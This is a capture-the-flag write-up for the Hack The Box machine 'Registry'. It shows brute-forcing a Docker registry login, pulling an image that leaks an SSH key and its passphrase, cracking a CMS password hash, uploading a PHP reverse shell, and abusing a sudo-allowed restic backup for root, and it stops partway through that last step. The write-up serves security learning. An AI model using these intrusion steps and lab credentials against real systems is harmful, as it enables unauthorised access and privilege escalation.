I"}é<p><img src="/asset/images/registry/card.png" alt="Registry" /></p>

<h1 id="introduction">Introduction</h1>
<p>Hello and welcome to my writeup for registry, very well designed box, enjoyed every part of it.</p>

<h1 id="service-enumeration">Service Enumeration</h1>
<p>Checking available services with a classic nmap</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Thu Nov 28 19:42:42 2019 as: nmap -sC -sV -oA box -Pn box</span>
Nmap scan report <span class="k">for </span>box <span class="o">(</span>10.10.10.159<span class="o">)</span>
Host is up <span class="o">(</span>0.094s latency<span class="o">)</span><span class="nb">.</span>
rDNS record <span class="k">for </span>10.10.10.159: Registery.htb
Not shown: 996 closed ports
PORT      STATE    SERVICE  VERSION
22/tcp    open     ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 <span class="o">(</span>RSA<span class="o">)</span>
|   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp    open     http     nginx 1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Welcome to nginx!
443/tcp   open     ssl/http nginx 1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-server-header: nginx/1.14.0 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: Welcome to nginx!
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>docker.registry.htb
| Not valid before: 2019-05-06T21:14:35
|_Not valid after:  2029-05-03T21:14:35
13456/tcp filtered unknown
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Thu Nov 28 19:43:22 2019 -- 1 IP address (1 host up) scanned in 40.27 seconds</span>
</code></pre></div></div>

<h1 id="web-enumeration">Web Enumeration</h1>
<p>Home have nginx default on port 80, but trying 443 we notice that <code class="highlighter-rouge">https://registry.htb</code> use SSL certificate that contains this host : <code class="highlighter-rouge">docker.registry.htb</code></p>

<p>Appended it to <code class="highlighter-rouge">/etc/hosts</code>.</p>

<p>Started a gobuster instance with a medium wordlist.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry# gobuster <span class="nb">dir</span> <span class="nt">-u</span> http://registry.htb <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
<span class="o">===============================================================</span>
Gobuster v3.0.1
by OJ Reeves <span class="o">(</span>@TheColonial<span class="o">)</span> &amp; Christian Mehlmauer <span class="o">(</span>@_FireFart_<span class="o">)</span>
<span class="o">===============================================================</span>
<span class="o">[</span>+] Url:            http://registry.htb
<span class="o">[</span>+] Threads:        10
<span class="o">[</span>+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
<span class="o">[</span>+] Status codes:   200,204,301,302,307,401,403
<span class="o">[</span>+] User Agent:     gobuster/3.0.1
<span class="o">[</span>+] Timeout:        10s
<span class="o">===============================================================</span>
2019/11/28 02:21:25 Starting gobuster
<span class="o">===============================================================</span>
/install <span class="o">(</span>Status: 301<span class="o">)</span>
/bolt <span class="o">(</span>Status: 301<span class="o">)</span>
Progress: 50404 / 220561 <span class="o">(</span>22.85%<span class="o">)</span>^C
</code></pre></div></div>

<ol>
  <li><code class="highlighter-rouge">/bolt</code> contain default CMS page, nothing intresting pops up.</li>
  <li><code class="highlighter-rouge">/install</code> contain  what appears to be random data at first.</li>
</ol>

<p>But if use wget to pull cleanly the file, we could notice its actually a sneaky <strong>gzip</strong>, but the server is serving the file as a text meme type.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry# wget http://registry.htb/install 
<span class="nt">--2020-04-03</span> 02:34:46--  http://registry.htb/install
Resolving registry.htb <span class="o">(</span>registry.htb<span class="o">)</span>... 10.10.10.159
Connecting to registry.htb <span class="o">(</span>registry.htb<span class="o">)</span>|10.10.10.159|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://registry.htb/install/ <span class="o">[</span>following]
<span class="nt">--2020-04-03</span> 02:34:46--  http://registry.htb/install/
Reusing existing connection to registry.htb:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified <span class="o">[</span>text/html]
Saving to: ‚Äòinstall‚Äô

<span class="nb">install</span>                                             <span class="o">[</span> &lt;<span class="o">=&gt;</span>                                                                                                  <span class="o">]</span>   1.03K  <span class="nt">--</span>.-KB/s    <span class="k">in </span>0s      

2020-04-03 02:34:46 <span class="o">(</span>34.3 MB/s<span class="o">)</span> - ‚Äòinstall‚Äô saved <span class="o">[</span>1050]

root@Zakali:~/ROOTED/Registry# file <span class="nb">install 
install</span>: <span class="nb">gzip </span>compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original 
size modulo 2^32 167772200 <span class="nb">gzip </span>compressed data, reserved method, has CRC, was <span class="s2">""</span>, 
from FAT filesystem <span class="o">(</span>MS-DOS, OS/2, NT<span class="o">)</span>, original size modulo 2^32 167772200
</code></pre></div></div>

<p>Extracting the gzip, we get both a certificate, and links to a docker documention about registry and certificates.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry/Docs/a# <span class="nb">tar </span>xzvf install.gz 
<span class="nb">gzip</span>: stdin: unexpected end of file
ca.crt
readme.md
<span class="nb">tar</span>: Child returned status 1
<span class="nb">tar</span>: Error is not recoverable: exiting now
root@Zakali:~/ROOTED/Registry/Docs/a# <span class="nb">ls
</span>ca.crt  install.gz  readme.md
root@Zakali:~/ROOTED/Registry/Docs/a# 
root@Zakali:~/ROOTED/Registry/Docs/a# <span class="nb">cat </span>readme.md 
<span class="c"># Private Docker Registry</span>

- https://docs.docker.com/registry/deploying/
- https://docs.docker.com/engine/security/certificates/
root@Zakali:~/ROOTED/Registry/Docs/a# <span class="nb">cat </span>ca.crt 
<span class="nt">-----BEGIN</span> CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
8/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
7JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
<span class="nt">-----END</span> CERTIFICATE-----
</code></pre></div></div>

<h1 id="registry-enumeration">Registry Enumeration</h1>
<p>Here is my thought process, the box name is registry, and we get plenty of hints that its using docker, and knowing that a registry is like a place where we can stock docker images, so there is probably a registry service running on the host.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry# docker login docker.registry.htb
Username: 
Error: Non-null Username Required
</code></pre></div></div>
<p>Attempting to connect to it triggers a authentication errors, hence it confirms the presence of that service and make you look for the creds, immediatly brute force is with hydra.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/Registry# hydra <span class="nt">-L</span> usernames <span class="nt">-P</span> /usr/share/wordlists/fasttrack.txt docker.registry.htb http-get /v2/_catalog
Hydra v9.0 <span class="o">(</span>c<span class="o">)</span> 2019 by van Hauser/THC - Please <span class="k">do </span>not use <span class="k">in </span>military or secret service organizations, or <span class="k">for </span>illegal purposes.

Hydra <span class="o">(</span>https://github.com/vanhauser-thc/thc-hydra<span class="o">)</span> starting at 2019-11-29 17:12:34
<span class="o">[</span>DATA] max 16 tasks per 1 server, overall 16 tasks, 5328 login tries <span class="o">(</span>l:24/p:222<span class="o">)</span>, ~333 tries per task
<span class="o">[</span>DATA] attacking http-get://docker.registry.htb:80/v2/_catalog
<span class="o">[</span>80][http-get] host: docker.registry.htb   login: admin   password: admin
<span class="o">[</span>STATUS] 2200.00 tries/min, 2200 tries <span class="k">in </span>00:01h, 3128 to <span class="k">do in </span>00:02h, 16 active
^CThe session file ./hydra.restore was written. Type <span class="s2">"hydra -R"</span> to resume session.
</code></pre></div></div>

<p>Great, we got creds, once again, its good to try default creds before of bruteforcing, should have done that, but that works too.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry# docker login docker.registry.htb <span class="nt">-u</span> admin <span class="nt">-p</span> admin WARNING! Using <span class="nt">--password</span> via the CLI is insecure. Use <span class="nt">--password-stdin</span><span class="nb">.</span>
INFO[0000] Error logging <span class="k">in </span>to v2 endpoint, trying next endpoint: Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority 
Get https://docker.registry.htb/v2/: x509: certificate signed by unknown authority
</code></pre></div></div>

<p>I managed to attempt again to login but we got a new error this time, a cert error!
That cert file will probably be used to log in, after more googling, got two intrestings links that help me use that cert and fix the error, two relvant manual pages:</p>

<ol>
  <li><a href="https://docs.docker.com/registry/deploying/"><strong>Deploy a registry server</strong></a></li>
  <li><a href="https://docs.docker.com/registry/insecure/"><strong>Use self-signed certificates</strong></a></li>
</ol>

<p>Now we know the path of where to put it which is <code class="highlighter-rouge">/etc/docker/certs.d/docker.registry.htb</code></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~# <span class="nb">cat</span> /etc/docker/certs.d/docker.registry.htb/ca.crt 
<span class="nt">-----BEGIN</span> CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
8/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
7JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
<span class="nt">-----END</span> CERTIFICATE-----
</code></pre></div></div>

<p>And we are finally loged in.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~# docker login https://docker.registry.htb <span class="nt">-u</span> admin <span class="nt">-p</span> admin
WARNING! Using <span class="nt">--password</span> via the CLI is insecure. Use <span class="nt">--password-stdin</span><span class="nb">.</span>
WARNING! Your password will be stored unencrypted <span class="k">in</span> /root/.docker/config.json.
Configure a credential helper to remove this warning. See
https://docs.docker.com/engine/reference/commandline/login/#credentials-store

Login Succeeded
</code></pre></div></div>

<p>Let‚Äôs see what this registry has to offer:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~# docker search docker.registry.htb
NAME                               DESCRIPTION                          STARS               OFFICIAL            AUTOMATED
evandrix/htb-registry-bolt-image   docker.registry.htb:443/bolt-image   0                                       
</code></pre></div></div>

<h1 id="docker-image-enumeration">Docker Image Enumeration</h1>
<p>Great there is an image! let‚Äôs pull it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~# docker pull docker.registry.htb/bolt-image

</code></pre></div></div>

<p>We then run a bash instance inside the container.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~# docker run <span class="nt">-it</span> docker.registry.htb/bolt-image  bash
root@e45cbfa3189a:/# 
</code></pre></div></div>

<p>Using classic privelage ‚Äúescalation‚Äù techniques, we spot a juicy encrypted ssh private key, paired with a public one that leaks the user, on root‚Äôs ssh folder.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@e45cbfa3189a:/# <span class="nb">head</span> /root/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDQ0QB2PXyb2AUShspjygtkqjzXFuX0dbayPI/irOEYCAOtgQs+nb9Ij3vZZX
+LMPpNtWJaGF+ti/5gTjnhfjyNji7L/3Se6aIJAqMlFqkf+E5xKntRlM9dpqMMNRLgAYAKW5lj5OciQ7ZaXx7btoYLiQHlxXbj
8RwEirWuFqwbi2lznckAU9Ua1DSu6yKdqIIpkB2FvJVFakTS32FagJ+rGm9TIWeiOPaQvKhyXQ0jeBL4Sdi5PmhLtkdOEWVgYVSoWaOythA3J2c1UAhfl5dLGS0FuD4Dv46xyrI8H7gpAexa1yF3Kei4PTHBEIQxscejsfCEOVZwe4sngYKrU7o6sf0rWpOf7jHuEUMCZVQgQ55fvv10P6CA2qhPQ/bpKzp2pGXRb1Xdr6v+ObgQ4knkK1GKqOegOane0wyhD5RFQF/NeYBqt1UIM2KigDv9foENc7p9HhHGFoWJEzyOeWCm4QcSg9H2ZgfZRAhCoiEijHh19SdNh9wanydkaj9H7iTsvNDi8ON4sLRGjVBsfPLl+UjIIsHU+bG+pxHUzb65yHJ8iFX+DndJncdbQs6X9Ckii58ElBmkSUDSZpFsOV81vVk6qdGm+EBcpVO09YsC03nUj1VEHtQG8hOG/t
JqesB50I5Gbi7+V2qZit3ZZOvkhVF5l2N0U9asjSpIT5Bmow<span class="o">==</span> bolt@registry.htb
root@e45cbfa3189a:/# <span class="nb">head</span> /root/.ssh/id_rsa
<span class="nb">head</span> /root/.ssh/id_rsa
<span class="nt">-----BEGIN</span> RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9

KF9YHXRjDZ35Q9ybzkhcUNKF8DSZ+aNLYXPL3kgdqlUqwfpqpbVdHbMeDk7qbS7w
KhUv4Gj22O1t3koy9z0J0LpVM8NLMgVZhTj1eAlJO72dKBNNv5D4qkIDANmZeAGv
7RwWef8FwE3jTzCDynKJbf93Gpy/hj/SDAe77PD8J/Yi01Ni6MKoxvKczL/gktFL
/mURh0vdBrIfF4psnYiOcIDCkM2EhcVCGXN6BSUxBud+AXF0QP96/8UN8A5+O115
p7eljdDr2Ie2LlF7dhHSSEMQG7lUqfEcTmsqSuj9lBwfN22OhFxByxPvkC6kbSyH
XnUqf+utie21kkQzU1lchtec8Q4BJIMnRfv1kufHJjPFJMuWFRbYAYlL7ODcpIvt
</code></pre></div></div>

<p>More Enumeration and we spot another script that contain the passphrase to private ssh key.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@e45cbfa3189a:/etc# <span class="nb">cat</span> /etc/profile.d/01-ssh.sh 
<span class="c">#!/usr/bin/expect -f</span>
<span class="c">#eval `ssh-agent -s`</span>
spawn ssh-add /root/.ssh/id_rsa
expect <span class="s2">"Enter passphrase for /root/.ssh/id_rsa:"</span>
send <span class="s2">"GkOcz221Ftb3ugog</span><span class="se">\n</span><span class="s2">"</span><span class="p">;</span>
expect <span class="s2">"Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"</span>
interact
</code></pre></div></div>

<p>And boom we got user, one hell of a ride.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry/User# ssh bolt@registry.htb <span class="nt">-i</span> id_rsa  
The authenticity of host <span class="s1">'registry.htb (10.10.10.159)'</span> can<span class="s1">'t be established.
ECDSA key fingerprint is SHA256:G1J5ek/T6KuCCT7Xp2IN1LUslRt24mhmhKUo/kWWVrs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '</span>registry.htb,10.10.10.159<span class="s1">' (ECDSA) to the list of known hosts.
Enter passphrase for key '</span>id_rsa<span class="s1">': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-65-generic x86_64)

  System information as of Fri Apr  3 02:48:45 UTC 2020

  System load:  0.0               Users logged in:                0
  Usage of /:   5.6% of 61.80GB   IP address for eth0:            10.10.10.159
  Memory usage: 31%               IP address for br-1bad9bd75d17: 172.18.0.1
  Swap usage:   1%                IP address for docker0:         172.17.0.1
  Processes:    155
Last login: Fri Apr  3 00:01:05 2020 from 10.10.14.180
bolt@bolt:~$ md5sum user.txt 
e4310f784ddfbd1a743f67bafaf78a98  user.txt
</span></code></pre></div></div>

<h1 id="previlege-descalation">Previlege Descalation</h1>
<p>Was curious if the user  was running inside a container or on the box host, was able to confirm that we are not inside container with this <a href="https://stackoverflow.com/questions/23513045/how-to-check-if-a-process-is-running-inside-docker-container">link</a>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#Prolly outside a docker container  </span>
bolt@bolt:/tmp/aaa<span class="nv">$ </span><span class="nb">cat</span>  /proc/1/cgroup
12:cpu,cpuacct:/
11:cpuset:/
10:memory:/
9:devices:/
8:hugetlb:/
7:rdma:/
6:blkio:/
5:pids:/
4:freezer:/
3:perf_event:/
2:net_cls,net_prio:/
1:name<span class="o">=</span>systemd:/init.scope
0::/init.scope
</code></pre></div></div>

<p>With the user access, I run the default linux previlege escalation script <a href="https://github.com/rebootuser/LinEnum">LinEnum</a>, noticed the path for the CMS and started my enumeration there.
After some time, I noticed the db, and decided to run strings on it.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry/User# scp <span class="nt">-i</span> id_rsa ~/Tools/public/LinEnum.sh bolt@registry.htb:/tmp 
Enter passphrase <span class="k">for </span>key <span class="s1">'id_rsa'</span>: 
LinEnum.sh                                                                                                                                                  100%   45KB  14.2KB/s   00:03    
bolt@bolt:/var/www/html/bolt/app/database<span class="nv">$ </span>strings bolt.db   | <span class="nb">grep </span>admin
KKÔøΩÔøΩ2ÔøΩ/3%<span class="o">=</span>3admin<span class="nv">$2y$10$e</span>.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb2019-12-01 05:01:0210.10.14.225Admin[<span class="s2">"files://webshell.php"</span><span class="o">][</span><span class="s2">"root"</span>,<span class="s2">"everyone"</span><span class="o">]</span>
ÔøΩÔøΩ admin
ÔøΩÔøΩ/ bolt@registry.htb
ÔøΩÔøΩ
3admin<span class="nv">$2y$10$e</span>.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PKbolt@registry.htb2019-12-01 05:01:0210.10.14.225Admin[<span class="s2">"files://webshell.php"</span><span class="o">][</span><span class="s2">"root"</span>,<span class="s2">"everyone"</span><span class="o">]</span>
 admin
</code></pre></div></div>
<p>We got the CMS admin hash, lets crack it with john and rockyou wordlist.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@Zakali:~/ROOTED/Registry/User/www-data# <span class="nb">cat </span>admin-hash 
admin:<span class="nv">$2y$10$e</span>.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK

root@Zakali:~/Registry/User/www-data# john <span class="nt">-w</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt admin-hash  
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>bcrypt <span class="o">[</span>Blowfish 32/64 X3]<span class="o">)</span>
Cost 1 <span class="o">(</span>iteration count<span class="o">)</span> is 1024 <span class="k">for </span>all loaded hashes
Will run 3 OpenMP threads
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
strawberry       <span class="o">(</span>admin<span class="o">)</span>
1g 0:00:00:07 DONE <span class="o">(</span>2019-12-01 22:34<span class="o">)</span> 0.1367g/s 48.01p/s 48.01c/s 48.01C/s strawberry..lorena
Use the <span class="s2">"--show"</span> option to display all of the cracked passwords reliably
Session completed
</code></pre></div></div>

<p>Wierdly enough, I was not able to find the admin login page, so I decided to check out the nginx website deployement config.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bolt@bolt:/etc/nginx<span class="nv">$ </span><span class="nb">cat </span>sites-enabled/01.registry.conf 
server <span class="o">{</span>
    listen 80<span class="p">;</span>
    listen <span class="o">[</span>::]:80<span class="p">;</span>
    listen 443 ssl<span class="p">;</span>
    include snippets/self-signed.conf<span class="p">;</span>
    include snippets/ssl-params.conf<span class="p">;</span>

    root /var/www/html<span class="p">;</span>
    index index.php index.html<span class="p">;</span> 

    server_name registry.htb<span class="p">;</span>

    location <span class="o">=</span> /bolt/app/database/bolt.db <span class="o">{</span>
        deny all<span class="p">;</span>
        <span class="k">return </span>404<span class="p">;</span>
    <span class="o">}</span>

    location <span class="o">=</span> /bolt/bolt <span class="o">{</span>
        try_files               <span class="nv">$uri</span> <span class="nv">$uri</span>/ /bolt/index.php?<span class="nv">$query_string</span><span class="p">;</span>
    <span class="o">}</span>

    location ^~ /bolt/bolt/ <span class="o">{</span>
        try_files                     <span class="nv">$uri</span> /bolt/index.php?<span class="nv">$query_string</span><span class="p">;</span>
    <span class="o">}</span>

    location ^~ /bolt/<span class="o">(</span>.<span class="k">*</span><span class="o">)</span><span class="nv">$ </span><span class="o">{</span>
        try_files               <span class="nv">$uri</span> <span class="nv">$uri</span>/ /bolt/index.php?<span class="nv">$query_string</span><span class="p">;</span>
    <span class="o">}</span>

    location ~ <span class="se">\.</span>php<span class="nv">$ </span><span class="o">{</span>
        include snippets/fastcgi-php.conf<span class="p">;</span>
        fastcgi_pass unix:/var/run/php/php7.2-fpm.sock<span class="p">;</span>
    <span class="o">}</span>

    location ~ /<span class="se">\.</span>ht <span class="o">{</span>
        deny all<span class="p">;</span>
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>Visiting <code class="highlighter-rouge">/bolt/bolt</code> instead of <code class="highlighter-rouge">bolt/login</code> and we are in the CMS login panel.</p>

<p><img src="/asset/images/registry/LoginBolt.png" alt="Bolt Login" /></p>

<p>Well, was a bit confused at first, since we have user, and the CMS is controlled by www-data which is a lower privelege than user in general, seemed to be backwards, nothing pointed me that focusing on the CMS will help get root, but the idea is to have as much controll on the machine as possible, and getting that shell is a way to increase control.
After attempting to upload a reverse shell php, I noticed that it does not allow that meme type, so I went to change the config to allow it.</p>

<p><img src="/asset/images/registry/PhpAccept.png" alt="Allowing PHP upload" /></p>

<p>After allowing php, uploading the php reverse shell, and triggering it by visiting it, we get www-data. (it had to be done fast, later noticed there is a cron cleaning to avoid spoilers for other players)</p>

<p>And we get a clean shell as <code class="highlighter-rouge">www-data</code>.</p>

<h1 id="previlege-escalation-root">Previlege Escalation (root)</h1>
<p>Let‚Äôs see what we can run :</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@bolt:~/html<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>www-data on bolt:
    env_reset, <span class="nv">exempt_group</span><span class="o">=</span><span class="nb">sudo</span>, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User www-data may run the following commands on bolt:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/restic backup <span class="nt">-r</span> rest<span class="k">*</span>
</code></pre></div></div>

<p>AHA! we can escalate to root somehow using a curious program named <code class="highlighter-rouge">restic</code> that is used to do password protected backups, more info about it <a href="https://restic.net/"><strong>here</strong></a>.</p>

<p>To be able to abuse this, I needed to master the usage of restic, and find a way to consider a usage that will allow me to escalate, rapid protyping on local and eating the documentation, made me realise that there is roughly 3 phases:</p>

<h3 id="initiating-a-backup-instance-on-a-folder-or-a-remote-server">Initiating a backup instance on a folder or a remote server</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>restic init <span class="nt">-r</span> instance
</code></pre></div></div>

<h3 id="using-that-backup-instance-to-store-data">Using that backup instance to store data</h3>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>restic backup <span class="nt">-r</span> instance WHAT
</code></pre></div></div>
<h3 id="and-finaly-restore-the-backuped-data">And finaly restore the backuped data</h3>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>restic restore Snapshot_id <span class="nt">-r</span> instance  <span class="nt">--target</span> WHERE
</code></pre></div></div>

<p>The sudoed command is the backup one, so we are able to backup any file we want on the host as root, and be able to restore it as a regular user, potentially able to read the whole system.
To be able to change from one user to another when we do backups, its better to use a remote server as a backup instance instead of a folder.</p>

<h1 id="exploitation">Exploitation</h1>

<h2 id="copy-restic-server-to-registryhtb">Copy restic server to registry.htb</h2>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scp <span class="nt">-i</span> id_rsa /root/Registry/www-data/rest-server/bi/bin bolt@registry.htb:/tmp/.aa
</code></pre></div></div>

<h2 id="start-the-server-as-user">Start the server as user</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bolt@bolt:/tmp/.aa<span class="nv">$ </span><span class="nb">ls
</span>bin
bolt@bolt:/tmp/.aa<span class="nv">$ </span><span class="nb">chmod</span> +x bin
bolt@bolt:/tmp/.aa<span class="nv">$ </span>./bin <span class="nt">--no-auth</span> <span class="nt">--path</span> <span class="nb">.</span>
Data directory: <span class="nb">.</span>
Authentication disabled
Private repositories disabled
Starting server on :8000

</code></pre></div></div>
<h2 id="init-a-repo-as-www-data-on-the-remote-server">Init a repo as www-data on the remote server</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>www-data@bolt:~/html<span class="nv">$ </span><span class="nb">ls
</span>backup.php  bolt  index.html  index.nginx-debian.html  <span class="nb">install
</span>www-data@bolt:~/html<span class="nv">$ </span>restic init <span class="nt">-r</span> rest:http://registry.htb:8000
enter password <span class="k">for </span>new repository: 
enter password again: 
created restic repository 8feaba0e5e at rest:http://registry.htb:8000

Please note that knowledge of your password is required to access
the repository. Losing your password means that your data is
irrecoverably lost.

</code></pre></div></div>

<h2 id="backup-the-whole-root-folder-as-www-data">Backup the whole root folder as www-data</h2>
